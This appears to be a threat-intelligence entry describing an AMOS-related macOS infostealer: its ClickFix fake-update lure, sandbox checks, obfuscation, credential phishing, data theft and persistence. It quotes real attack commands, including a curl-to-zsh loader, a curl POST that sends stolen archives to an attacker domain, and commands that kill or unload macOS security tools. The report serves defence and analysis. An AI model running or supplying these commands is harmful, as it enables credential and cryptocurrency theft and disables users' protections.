# AMOS-Related macOS Stealer Distributed via Fake Software Updates ("Catching macOS Stealers in the Wild")

> A macOS infostealer sample, assessed as probably related to Atomic Stealer (AMOS), is distributed via a ClickFix-style fake software update lure hosted on a Squarespace subdomain, then terminates Little Snitch/BlockBlock/LuLu, phishes the local account password against the Keychain, and exfiltrates browser data, Apple Notes, documents, and 256 targeted cryptocurrency wallet extensions.

- **Published:** 2026-04-01T00:00:00Z
- **Last reviewed:** 2026-04-01T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-2421
- **ID:** TL-2026-2421
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Actor:** AMOS Operators (Russia)
- **Detections:** 9 · **IOCs:** 21 (full data via the Threadlinqs MCP server — Purple tier)

## Description

Objective-See's Patrick Wardle team (analysis authored by Pablo Redondo Castro, published 2026-04-01) documented a macOS infostealer sample assessed as probably related to Atomic Stealer (AMOS) based on shared Squarespace-hosted lure infrastructure previously seen in AMOS campaigns. Victims land on a fake software-update page (Mac-force.squarespace.com) that instructs them to copy and paste a Terminal command — a ClickFix-pattern lure: `curl -LsfSk $(echo '[base64]'|base64 -D)| zsh`. The decoded command pulls a second-stage payload from rvdownloads.com/frozenfix/update via zsh.

Before acting, the malware performs anti-analysis checks, calling `system_profiler` and inspecting the output for VM/sandbox indicators — strings such as "QEMU", "VMware", "KVM", specific hardware serial numbers ("Z31FHXYQ0J", "C07T508TG1J2", "C02TM2ZBHX87"), "Chip: Unknown", and "Intel Core 2" processors that would indicate a virtualized analysis environment rather than a real victim Mac. The payload itself is heavily obfuscated: string literals are stored as arrays of numbers reconstructed at runtime by three custom decoder functions (`ssooouzowk()`, `uyvhofylsr()`, `ljmhoouy()`) using subtraction/addition/offset-subtraction arithmetic, backed by over 400 encoded variables named `gmeaaapd0` through `gmeaaapd434`, and driven by obfuscated inline AppleScript.

Once running, the malware actively neutralizes three well-known macOS security tools before continuing: it force-kills Little Snitch and BlockBlock (`killall -9 "Little Snitch"`, `killall -9 "BlockBlock"`) and unloads LuLu's LaunchAgent (`launchctl unload ~/Library/LaunchAgents/com.objective-see.lulu.plist`). It then displays a fake system dialog claiming "Application wants to install helper" to phish the local account password, validating each entry against the local Keychain via `security find-generic-password -ga 'Safari' -w` in a loop until the correct password is captured, and writes the harvested password to `~/.pwd` in plaintext.

With the captured password it escalates to extract Safari Keychain items and pulls login data, cookies, web data, and local extension settings from Chrome, Brave Browser, Microsoft Edge, Opera Software, and Firefox. It also copies the Apple Notes database (`~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`) and note attachments, and harvests desktop/document files (`.txt, .pdf, .doc, .docx, .xls, .xlsx, .key, .pages, .numbers`) up to a 30MB cap. Separately it enumerates 256 cryptocurrency wallet browser-extension IDs (including MetaMask, Phantom, Coinbase Wallet, Binance Wallet, TerraStation, and OKX Wallet) to steal wallet extension storage. Stolen artifacts are archived with `tar` and exfiltrated via `curl -X POST -F 'file=@/tmp/archive.tar.gz' https://laislivon.com/upload` — a domain the researchers note is "related to previous AMOS campaigns."

For persistence, the malware drops a LaunchAgent at `~/Library/LaunchAgents/com.apple.mdworker.plist`, a filename chosen to masquerade as a legitimate Spotlight-related component, with an internal label of `com.apple.systemupdate` and `RunAtLoad`/`KeepAlive` both set true, embedding the complete obfuscated AppleScript stealer inline so it reruns on every login.

## MITRE ATT&CK

- T1204 User Execution
- T1059 Command and Scripting Interpreter
- T1543 Create or Modify System Process
- T1036 Masquerading
- T1027 Obfuscated Files or Information
- T1685 Disable or Modify Tools
- T1497 Virtualization/Sandbox Evasion
- T1518 Software Discovery
- T1555 Credentials from Password Stores
- T1552 Unsecured Credentials
- T1056 Input Capture
- T1005 Data from Local System
- T1119 Automated Collection
- T1560 Archive Collected Data
- T1071 Application Layer Protocol
- T1657 Financial Theft

## Sources

- [Catching macOS Stealers in the Wild](https://objective-see.org/blog/blog_0x88.html)
- [macOS Stealer in the Wild: AMOS-Linked Fake Updates](https://socprime.com/active-threats/macos-stealers-observed-what-defenders-should-watch-for/)
- [Atomic macOS Stealer includes a backdoor for persistent access](https://moonlock.com/amos-backdoor-persistent-access)
- [MacOS Infostealer AMOS Evolves with Backdoor for Persistent Access](https://www.infosecurity-magazine.com/news/macos-infostealer-amos-backdoor/)
- [ClickFix campaign uses fake macOS utilities lures to deliver infostealers](https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/)
- [Over 250 ClickFix Domains Use Browser Fingerprinting to Hide macOS Malware Lures](https://thehackernews.com/2026/08/over-250-clickfix-domains-use-browser.html)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-2421
